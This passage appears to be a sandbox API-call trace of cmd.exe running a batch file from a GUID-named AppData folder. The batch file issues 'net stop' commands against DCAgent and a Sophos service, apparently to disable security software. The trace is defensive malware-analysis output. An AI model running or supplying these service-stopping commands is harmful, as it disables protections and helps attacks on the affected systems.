dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop DCAgent /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x8bc, dwThreadId=0xa34)) returned 1 [0049.786] CloseHandle (hObject=0x78) returned 1 [0049.786] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0049.786] GetProcessHeap () returned 0x3e0000 [0049.786] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0049.786] GetEnvironmentStringsW () returned 0x3f8408* [0049.786] GetProcessHeap () returned 0x3e0000 [0049.786] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0049.786] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0049.786] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0049.950] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0049.950] CloseHandle (hObject=0x74) returned 1 [0049.950] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0049.950] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0049.950] GetProcessHeap () returned 0x3e0000 [0049.950] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0049.950] GetEnvironmentStringsW () returned 0x3f8408* [0049.950] GetProcessHeap () returned 0x3e0000 [0049.950] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0049.951] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0049.951] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0049.951] GetProcessHeap () returned 0x3e0000 [0049.951] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0049.951] GetEnvironmentStringsW () returned 0x3f8408* [0049.951] GetProcessHeap () returned 0x3e0000 [0049.951] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0049.951] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0049.951] GetProcessHeap () returned 0x3e0000 [0049.951] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0049.951] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0049.951] _get_osfhandle (_FileHandle=1) returned 0x264 [0049.951] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0049.951] _get_osfhandle (_FileHandle=1) returned 0x264 [0049.951] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0049.951] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0049.951] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0049.951] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0049.951] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0049.952] SetConsoleInputExeNameW () returned 0x1 [0049.952] GetConsoleOutputCP () returned 0x1b5 [0049.952] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0049.952] SetThreadUILanguage (LangId=0x0) returned 0x409 [0049.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0049.952] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0049.952] _get_osfhandle (_FileHandle=3) returned 0x74 [0049.952] SetFilePointer (in: hFile=0x74, lDistanceToMove=2271, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8df [0049.952] GetProcessHeap () returned 0x3e0000 [0049.952] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0049.952] GetProcessHeap () returned 0x3e0000 [0049.952] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0049.952] GetProcessHeap () returned 0x3e0000 [0049.952] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0049.952] GetProcessHeap () returned 0x3e0000 [0049.952] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0049.953] GetProcessHeap () returned 0x3e0000 [0049.953] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0049.953] _get_osfhandle (_FileHandle=3) returned 0x74 [0049.953] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8df [0049.953] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xfe2, lpOverlapped=0x0) returned 1 [0049.953] SetFilePointer (in: hFile=0x74, lDistanceToMove=2312, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x908 [0049.953] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=41, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos Message RouterΓÇ¥ /y\r\n/y\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 41 [0049.953] _get_osfhandle (_FileHandle=3) returned 0x74 [0049.953] GetFileType (hFile=0x74) returned 0x1 [0049.953] _get_osfhandle (_FileHandle=3) returned 0x74 [0049.953] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x908 [0049.954] GetProcessHeap () returned 0x3e0000 [0049.954] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0049.954] GetProcessHeap () returned 0x3e0000 [0049.954] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0049.954] _tell (_FileHandle=3) returned 2312 [0049.954] _close (_FileHandle=3) returned 0 [0049.954] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0049.954] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0049.954] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0049.954] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0049.954] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0049.954] _wcsicmp (_String1="net", _String2="CD") returned 11 [0049.955] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0049.955] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0049.955] _wcsicmp (_String1="net", _String2="REN") returned -4 [0049.955] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0049.955] _wcsicmp (_String1="net", _String2="SET") returned -5 [0049.955] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0049.955] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0049.955] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0049.955] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0049.955] _wcsicmp (_String1="net", _String2="MD") returned 1 [0049.955] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0049.955] _wcsicmp (_String1="net", _String2="RD") returned -4 [0049.955] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0049.955] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0049.955] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0049.955] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0049.955] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0049.955] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0049.955] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0049.955] _wcsicmp (_String1="net", _String2="VER") returned -8 [0049.955] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0049.955] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0049.955] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0049.955] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0049.955] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0049.955] _wcsicmp (_String1="net", _String2="START") returned -5 [0049.955] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0049.955] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0049.955] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0049.955] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0049.955] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0049.955] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0049.955] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0049.955] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0049.955] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0049.955] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0049.956] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0049.956] SetErrorMode (uMode=0x0) returned 0x1 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0049.956] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0049.956] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0049.956] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0049.956] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0049.956] GetProcessHeap () returned 0x3e0000 [0049.956] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0049.956] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.956] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0049.956] GetLastError () returned 0x2 [0049.957] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0049.957] GetLastError () returned 0x2 [0049.957] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.957] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0049.957] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0049.957] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0049.957] GetLastError () returned 0x2 [0049.957] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0049.957] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0049.957] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0049.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0049.958] SetErrorMode (uMode=0x0) returned 0x1 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0049.958] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0049.958] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0049.958] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0049.958] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0049.958] GetProcessHeap () returned 0x3e0000 [0049.958] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0049.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.958] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0049.958] GetLastError () returned 0x2 [0049.958] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0049.959] GetLastError () returned 0x2 [0049.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0049.959] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0049.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0049.959] GetLastError () returned 0x2 [0049.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0049.959] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0049.959] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0049.959] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0049.959] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0049.959] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0049.959] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0049.959] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos Message RouterΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos Message RouterΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos Message RouterΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa28, dwThreadId=0xa1c)) returned 1 [0049.963] CloseHandle (hObject=0x74) returned 1 [0049.963] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0049.963] GetProcessHeap () returned 0x3e0000 [0049.963] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0049.963] GetEnvironmentStringsW () returned 0x3f8408* [0049.963] GetProcessHeap () returned 0x3e0000 [0049.963] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0049.963] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0049.963] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0050.208] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0050.215] CloseHandle (hObject=0x78) returned 1 [0050.215] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0050.215] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0050.215] GetProcessHeap () returned 0x3e0000 [0050.216] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0050.216] GetEnvironmentStringsW () returned 0x3f8408* [0050.216] GetProcessHeap () returned 0x3e0000 [0050.216] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0050.216] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0050.216] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0050.217] GetProcessHeap () returned 0x3e0000 [0050.217] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0050.217] GetEnvironmentStringsW () returned 0x3f8408* [0050.217] GetProcessHeap () returned 0x3e0000 [0050.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0050.217] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0050.217] GetProcessHeap () returned 0x3e0000 [0050.217] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0050.217] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0050.217] _get_osfhandle (_FileHandle=1) returned 0x264 [0050.217] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0050.217] _get_osfhandle (_FileHandle=1) returned 0x264 [0050.217] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0050.217] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0050.217] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0050.218] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0050.218] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0050.218] SetConsoleInputExeNameW () returned 0x1 [0050.218] GetConsoleOutputCP () returned 0x1b5 [0050.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0050.218] SetThreadUILanguage (LangId=0x0) returned 0x409 [0050.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0050.218] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0050.218] _get_osfhandle (_FileHandle=3) returned 0x78 [0050.218] SetFilePointer (in: hFile=0x78, lDistanceToMove=2312, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x908 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0050.219] GetProcessHeap () returned 0x3e0000 [0050.219] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0050.219] _get_osfhandle (_FileHandle=3) returned 0x78 [0050.219] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x908 [0050.219] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: 